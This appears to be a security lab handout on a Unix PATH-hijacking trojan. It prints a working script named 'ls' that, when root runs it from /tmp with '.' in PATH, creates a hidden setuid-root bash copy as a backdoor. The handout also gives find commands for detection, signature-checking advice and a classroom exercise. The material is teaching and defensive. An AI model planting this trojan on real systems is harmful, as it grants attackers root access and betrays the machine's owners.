Assume, root has path set as follows: PATH=.:$PATH
Hacker puts the script in /tmp and gives it name ls
When root comes in /tmp and executes ls it creates a back
door for the hacker.
When a user executes
/tmp/.sh -p
he becomes root.
#!/bin/sh
who=`whoami`
# check if I am the root:
if [ "$who" = "root" ]
then
cp /bin/bash .sh
chmod 4755 .sh
/bin/rm ls
fi
/bin/ls $*
This trojan can be found with find command:
find /tmp -type f -perm /u=s,g=s -ls
or
find /tmp -type f -perm /6000 -ls
Very often, Trojans come with a new software.
Verify developers signatures using checksums or GPG/PGP tools.
Exercise
Create the script as a user in /tmp; chmod 755 ls; login as superuser;
modify your path variables by including "."
export PATH=.:$PATH
cd /tmp
ls
exit
login as a user, then
cd /tmp
/tmp/.sh -p
then see what happens.
When you finish with the exercise, DON'T FORGET to remove /tmp/.sh !!!